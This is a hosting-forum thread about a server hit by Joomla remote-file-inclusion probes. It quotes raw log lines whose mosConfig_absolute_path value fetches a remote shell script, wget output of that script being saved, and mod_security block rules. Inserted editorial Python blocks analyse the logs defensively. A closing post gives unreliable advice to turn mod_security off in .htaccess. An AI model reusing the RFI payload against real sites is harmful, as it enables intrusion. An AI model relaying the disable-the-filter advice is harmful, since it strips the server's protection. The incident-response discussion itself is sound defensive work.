Attacked - Perl processes/Mod_security - Help!

jeroman8 (Well-Known Member, Mar 14, 2003)
Hi!

The past 2 days I have had many, many Perl processes running.
When I can get in to the server, load is between 100-150.
So to be able to work I kill all perl processes.

I think it's a php script being used to run an off-site script.
My mod_security seems to block a lot of stuff regarding similar stuff, so I wonder if it
is possible that mod_security will fail if the server is being attacked?

What is the "libwww-perl/5.805" at the end of the log below?
It changes version number - like it's trying to find something....

I found a script in /tmp today, was not there yesterday, but could not see it
since my virus program stopped me from reading it.


72.9.239.178 - - [22/Sep/2006:12:02:57 +0200] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.mr-ylli.com/sh3llxs.txt? HTTP/1.1" 403 - "-" "libwww-perl/5.805"
81.17.45.171 - - [22/Sep/2006:12:03:02 +0200] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.mr-ylli.com/sh3llxs.txt? HTTP/1.1" 403 - "-" "libwww-perl/5.69"
193.198.217.3 - - [22/Sep/2006:12:03:24 +0200] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.mr-ylli.com/sh3llxs.txt? HTTP/1.1" 403 - "-" "libwww-perl/5.803"
66.36.233.10 - - [22/Sep/2006:12:03:28 +0200] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.mr-ylli.com/sh3llxs.txt? HTTP/1.1" 403 - "-" "libwww-perl/5.805"
62.199.234.50 - - [22/Sep/2006:12:03:29 +0200] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.mr-ylli.com/sh3llxs.txt? HTTP/1.1" 403 - "-" "libwww-perl/5.803"
70.85.88.196 - - [22/Sep/2006:12:03:43 +0200] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.mr-ylli.com/sh3llxs.txt? HTTP/1.1" 403 - "-" "libwww-perl/5.805"
66.148.74.139 - - [22/Sep/2006:12:04:02 +0200] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.mr-ylli.com/sh3llxs.txt? HTTP/1.1" 403 - "-" "libwww-perl/5.79"
 

jeroman8 (Well-Known Member, Mar 14, 2003)
Look!

He managed to save the file to the server somehow!!
Where the fu... is this file now - can't find it in tmp or the folders on the "site" account...

[Fri Sep 22 12:20:44 2006] [error] SecServerSignature: the existing signature is too short. Please set ServerTokens to Full
[Fri Sep 22 12:20:44 2006] [error] SecServerSignature: the existing signature is too short. Please set ServerTokens to Full

[Fri Sep 22 12:20:51 2006] [error] [client 193.198.217.3] File does not exist: /home/site/public_html/403.shtml
[Fri Sep 22 12:20:53 2006] [error] [client 193.198.217.3] mod_security: Access denied with code 403. Pattern match "(\\\\.\\\\./\\\\.\\\\.|/|(http|https|ftp)\\\\:/)" at ARG("mosConfig_absolute_path") [hostname "www.site.se"] [uri "/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.mr-ylli.com/sh3llxs.txt?"]
[Fri Sep 22 12:20:53 2006] [error] [client 193.198.217.3] File does not exist: /home/site/public_html/403.shtml
--12:20:55-- http://www.mr-ylli.com/sh3llx.txt
=> `sh3llx.txt'
Resolving www.mr-ylli.com... 38.113.1.146
Connecting to www.mr-ylli.com|38.113.1.146|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 17,114 (17K) [text/plain]

0K .......... ...... 100% 373.41 KB/s

12:20:55 (373.41 KB/s) - `sh3llx.txt' saved [17114/17114]
 

randomuser (Well-Known Member, Jun 25, 2005)
jeroman8 said:
The past 2 days I have had many, many Perl processes running.
When I can get in to the server load is between 100-150.
So to be able to work I kill all perl processes.
/usr/sbin/lsof -p pid

jeroman8 said:
I wonder if it
is possible that mod_security will fail if the server is being attacked?
fail to catch an attack? absolutely. it only blocks what it knows to block.
everything else will bypass modsec.

fail to continue to function? no.

jeroman8 said:
What is the "libwww-perl/5.805" at the end of the log below?
this is the user-agent. look at some other logs to see different
user-agents (such as MSIE, Firefox, and so on). libwww-perl
is generally a suspicious user-agent.

jeroman8 said:
It changes version number - like it's trying to find something...
only changes because of a different version, like MSIE 5.0, or MSIE 6.0

jeroman8 said:
I found a script in /tmp today, was not there yesterday, but could not see it
since my virus program stopped me from reading it.
don't use windows to view it then

these are all 403s.

http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html#sec10.4.4

jeroman8 said:
Where the fu... is this file now
updatedb && locate sh3llx.txt, or
find /home -name sh3llx.txt
(use the manpages)

also, it may be in /tmp (or /var/tmp, or /dev/shm, depending on
your permissions and partition setup)

jeroman8 said:
This seems odd but I think it's named being the exploit here.

When all the PERL processes are running and I stop named it disappears.

[ .. ] pdf link [ .. ]
the pdf explains a DoS situation in BIND, but not arbitrary code execution,
just a DoS.

ps aux | grep perl
/usr/sbin/lsof -p pid

to see more info on the file.

who is the user, nobody, or are you using phpsuexec
and can see the actual user?

if you see the file in /tmp, do: stat filename
note the ctime/mtime, grep your domlogs for accesses
during this time, and find the vulnerable web script that
is being exploited. it could be anything, possibly something
with this path:

/administrator/components/com_comprofiler/plugin.class.php

or something else.
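The triage procedure randomuser describes (stat the dropped file, note its ctime/mtime, then grep the domlogs for requests around that time and find the script being abused) can be scripted. The block below is an added example written for this thread; it is not code from the thread or from any poster. It parses Apache combined-format lines, flags query arguments that carry a remote URL or a ../.. traversal (the meaningful alternatives of the mod_security pattern in the thread's error log), flags the libwww-perl user-agent, lists the source IPs that made such requests within a window around a file's timestamp, and counts per IP how many attempts were served with a 2xx rather than a 403. The sample log is constructed: the first two lines follow the thread's domlog entries, the third is an assumed unblocked variant, and the fourth is a benign request. The function names (parse_log, rfi_parameter, suspicious_user_agent, requests_near, rfi_ips_near, rfi_summary) are mine.

```python
import re
from datetime import datetime, timedelta
from urllib.parse import urlsplit, parse_qsl

# Constructed sample in Apache combined log format. Lines 1 and 2 follow the domlog entries
# quoted in the thread (the second one's time comes from the thread's error log); line 3 is an
# assumed variant that was not blocked (status 200) and line 4 is a benign request for contrast.
SAMPLE_LOG = """\
72.9.239.178 - - [22/Sep/2006:12:02:57 +0200] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.mr-ylli.com/sh3llxs.txt? HTTP/1.1" 403 - "-" "libwww-perl/5.805"
193.198.217.3 - - [22/Sep/2006:12:20:53 +0200] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.mr-ylli.com/sh3llxs.txt? HTTP/1.1" 403 - "-" "libwww-perl/5.803"
193.198.217.3 - - [22/Sep/2006:12:20:54 +0200] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.mr-ylli.com/sh3llx.txt? HTTP/1.1" 200 312 "-" "libwww-perl/5.803"
10.0.0.5 - - [22/Sep/2006:12:21:10 +0200] "GET /index.php?option=com_content HTTP/1.1" 200 5123 "-" "Mozilla/5.0 (X11; Linux)"
"""

# Apache "combined" format: ip ident user [time] "method target protocol" status size "referer" "ua"
CLF_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# The two meaningful alternatives of the mod_security pattern quoted in the thread: a remote URL
# scheme or a ../.. traversal inside an argument value. (The thread's rule also matches a bare "/",
# which is why it also fires on ordinary path-looking values.)
REMOTE_OR_TRAVERSAL = re.compile(r'(\.\./\.\.|(https?|ftp):/)')

SUSPICIOUS_UA = ("libwww-perl",)


def clf_time(ts):
    """Parse a CLF timestamp such as '22/Sep/2006:12:20:53 +0200' into an aware datetime."""
    return datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z")


def parse_log(text):
    """Turn combined-format log text into a list of dicts with parsed time, status and query args."""
    records = []
    for line in text.splitlines():
        m = CLF_RE.match(line)
        if not m:
            continue  # skip anything that is not a combined-format request line
        rec = m.groupdict()
        rec["time"] = clf_time(rec["ts"])
        rec["status"] = int(rec["status"])
        parts = urlsplit(rec["target"])
        rec["path"] = parts.path
        rec["args"] = parse_qsl(parts.query, keep_blank_values=True)
        records.append(rec)
    return records


def rfi_parameter(rec):
    """Name of the first query argument carrying a remote URL or traversal, else None."""
    for name, value in rec["args"]:
        if REMOTE_OR_TRAVERSAL.search(value):
            return name
    return None


def suspicious_user_agent(rec):
    return any(tag in rec["ua"] for tag in SUSPICIOUS_UA)


def requests_near(records, when, seconds):
    """Requests within +/- seconds of `when`, e.g. the ctime/mtime stat reports for a dropped file."""
    window = timedelta(seconds=seconds)
    return [r for r in records if abs(r["time"] - when) <= window]


def rfi_ips_near(records, when, seconds):
    """Source IPs that attempted remote file inclusion around the time the file appeared."""
    return sorted({r["ip"] for r in requests_near(records, when, seconds) if rfi_parameter(r)})


def rfi_summary(records):
    """Per source IP: number of RFI attempts and how many were served with a 2xx (not blocked)."""
    summary = {}
    for r in records:
        if rfi_parameter(r):
            entry = summary.setdefault(r["ip"], {"attempts": 0, "served": 0})
            entry["attempts"] += 1
            if 200 <= r["status"] < 300:
                entry["served"] += 1
    return summary


if __name__ == "__main__":
    recs = parse_log(SAMPLE_LOG)
    # Time the wget output in the thread reports the file as saved; on a real box use
    # datetime.fromtimestamp(os.stat(path).st_mtime, tz=...) instead.
    dropped_at = clf_time("22/Sep/2006:12:20:55 +0200")
    print("RFI attempts per IP:", rfi_summary(recs))
    print("RFI sources within 30s of file creation:", rfi_ips_near(recs, dropped_at, 30))
    for r in recs:
        print(r["ip"], r["status"], r["path"], rfi_parameter(r), "libwww" if suspicious_user_agent(r) else "")
```

Feed a real domlog with parse_log(open(path).read()). The 403 entries only show that mod_security refused the request; the ones to chase are the RFI attempts that got a 2xx, which is what the "served" counter in rfi_summary surfaces, and the path of such a request is the script to patch.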
 

ramprage (Well-Known Member, Jul 21, 2002, Canada)
That's an ancient joomla hole, not a hole in named. Unless they're trying to run some kind of exploit through joomla to further exploit the server.

Mod_security should easily stop these requests. Is it not for you? If not you need a new ruleset.
 

jeroman8 (Well-Known Member, Mar 14, 2003)
Thanks randomuser, I will check all this out.

Mod_sec is installed and blocking 99% of all attacks.
Obviously not all of them - I use 98% of hostmerits rules.
 

jeroman8 (Well-Known Member, Mar 14, 2003)
ramprage said:
Which ones isn't it blocking? I can write some rules for ya
This seems to block all of this:
SecFilterSelective HTTP_USER_AGENT "libwww-perl"

Hopefully there are no valid user agents named libwww-perl!?
 
hostww (Guest)
It does block something that might be useful to customers...

Requesting IP: 65.61.156.43
Date: 2006-10-09
Time: 23:00:57
Handler: /
GET: HTTP/1.0
Host: www.domain.com
Mod_Security-Message: Access denied with code 403. Pattern match "libwww-perl" at HEADER("USER-AGENT")
Mod_Security-Action: 403

[11:42pm] [N] Resolved server3.web-stat.com -> 65.61.156.43
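hostww's entry shows the cost of matching on the user-agent alone: the web-stat.com monitor uses libwww-perl and gets a 403 along with the scanners. The block below is an added example, not code from the thread or from any poster, that compares three rules written in the mod_security 1.x SecFilterSelective syntax used in the thread: the user-agent rule jeroman8 adopted, the argument pattern from the thread's error-log entry, and a narrower argument pattern I assume here that keeps only the remote-URL and ../.. alternatives. The matching is a simplified re-implementation for illustration (only the HTTP_USER_AGENT, ARGS and ARG_name variables are modelled), not mod_security's engine. The three requests are constructed: the thread's RFI probe, a monitor request like the one hostww saw (its exact user-agent string is assumed), and an ordinary request whose argument merely contains a slash.

```python
import re

# Rules in mod_security 1.x SecFilterSelective syntax. 'ua-only' is the rule the thread settled on;
# 'arg-broad' is the pattern from the thread's error-log entry (applied here to all arguments);
# 'arg-remote' is a narrower alternative assumed for this example. The matching below is a
# simplified re-implementation for illustration, not mod_security's engine.
RULES = [
    ("ua-only",    'SecFilterSelective HTTP_USER_AGENT "libwww-perl"'),
    ("arg-broad",  r'SecFilterSelective ARGS "(\.\./\.\.|/|(http|https|ftp)\:/)"'),
    ("arg-remote", r'SecFilterSelective ARGS "(\.\./\.\.|(https?|ftp):/)"'),
]

RULE_RE = re.compile(r'^SecFilterSelective (?P<var>\S+) "(?P<pattern>.*)"$')


def parse_rule(text):
    """Split a SecFilterSelective line into (variable name, compiled regex)."""
    m = RULE_RE.match(text)
    if not m:
        raise ValueError("unsupported rule syntax: " + text)
    return m.group("var"), re.compile(m.group("pattern"))


def rule_targets(var, request):
    """Values the variable refers to, for the subset of variables modelled here."""
    if var == "HTTP_USER_AGENT":
        return [request["ua"]]
    if var == "ARGS":
        return list(request["args"].values())
    if var.startswith("ARG_"):
        name = var[len("ARG_"):]
        return [request["args"][name]] if name in request["args"] else []
    raise ValueError("variable not modelled: " + var)


def rule_matches(rule_text, request):
    """True if the rule would deny the request (any target value matches the pattern)."""
    var, pattern = parse_rule(rule_text)
    return any(pattern.search(value) is not None for value in rule_targets(var, request))


def evaluate(requests, rules=RULES):
    """Map each rule name to the labels of the requests it would deny."""
    return {name: [r["label"] for r in requests if rule_matches(text, r)] for name, text in rules}


def false_positives(verdicts, benign):
    """Benign request labels each rule would deny, i.e. the cost of each rule."""
    return {name: [lbl for lbl in denied if lbl in benign] for name, denied in verdicts.items()}


# Constructed requests: the RFI probe from the thread, the web-stat monitor hostww saw denied
# (its exact user-agent string is assumed), and an ordinary request whose argument contains "/".
REQUESTS = [
    {"label": "rfi-probe", "ua": "libwww-perl/5.805",
     "args": {"mosConfig_absolute_path": "http://www.mr-ylli.com/sh3llxs.txt?"}},
    {"label": "web-stat-monitor", "ua": "libwww-perl/5.805", "args": {}},
    {"label": "gallery-page", "ua": "Mozilla/5.0", "args": {"dir": "photos/2006"}},
]
BENIGN = {"web-stat-monitor", "gallery-page"}

if __name__ == "__main__":
    verdicts = evaluate(REQUESTS)
    fp = false_positives(verdicts, BENIGN)
    for name, denied in verdicts.items():
        print(f"{name:11s} denies {denied}  false positives: {fp[name]}")
```

Run as-is it shows the trade-off: the user-agent rule denies the monitor, the thread's broad argument pattern denies the gallery page because of the bare "/" alternative, and only the argument rule restricted to remote URLs and traversal denies the probe alone. Rules keyed on what the request is trying to do (an argument holding a URL) age better than rules keyed on who sent it.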
 

student (Active Member, Aug 9, 2006)
jeroman8 said:
This seems to block all of this:
SecFilterSelective HTTP_USER_AGENT "libwww-perl"
After applying this to mod_security, entries such as:
"GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.mr-ylli.com/sh3llxs.txt? HTTP/1.1" 403 - "-" "libwww-perl/5.803"

are still appearing in the httpd log, is it normal? In the mod_security log I see that this connection is blocked, but if so, then how is it logged by apache? Shouldn't it be blocked first, even before apache can log this?

Ok, but speaking about mod_security rules, is it possible to filter the data link layer of all packets that are going through httpd? I'm wondering how to block every packet that contains the "#!/" string. Can mod_security do this?
 

jeroman8 (Well-Known Member, Mar 14, 2003)
Yes, it still logs the entry even if it is blocked.
They have access to the URL, but instead of being delivered a 200 OK and getting the page, they get the action 403 Forbidden and do not get the page requested.

You can probably do anything you like.

If you have not already - check out the host merit rules.
Do a search here for "host merit" "mod_security"
 

randomuser (Well-Known Member, Jun 25, 2005)
student said:
After applying this to mod_security, entries such as:
"GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.mr-ylli.com/sh3llxs.txt? HTTP/1.1" 403 - "-" "libwww-perl/5.803"

are still appearing in the httpd log, is it normal? In the mod_security log I see that this connection is blocked, but if so, then how is it logged by apache? Shouldn't it be blocked first, even before apache can log this?

Ok, but speaking about mod_security rules, is it possible to filter the data link layer of all packets that are going through httpd? I'm wondering how to block every packet that contains the "#!/" string. Can mod_security do this?
The default log is a 406, not a 403, and logs to /usr/local/apache/logs/audit_log vice the domlog (edit: my apologies - it does in fact log to both places). From /usr/local/apache/conf/modsec.conf:

SecFilterDefaultAction "deny,log,status:406"
If you added the user agent rule to modsec.conf, it may have been overwritten by cPanel. All rules should be placed in modsec.user.conf at all times.

If you placed the rule in either modsec.conf or modsec.user.conf, you need to restart httpd for the new rule to work.
 

meweb (Well-Known Member, Feb 10, 2003)
randomuser said:
The default log is a 406, not a 403, and logs to /usr/local/apache/logs/audit_log vice the domlog (edit: my apologies - it does in fact log to both places). From /usr/local/apache/conf/modsec.conf:

SecFilterDefaultAction "deny,log,status:406"

If you added the user agent rule to modsec.conf, it may have been overwritten by cPanel. All rules should be placed in modsec.user.conf at all times.

If you placed the rule in either modsec.conf or modsec.user.conf, you need to restart httpd for the new rule to work.
Just make sure to add the following lines to the .htaccess file under your public_html dir, restart apache and see the result.

##################
SecFilterEngine Off
SecFilterScanPOST Off
##################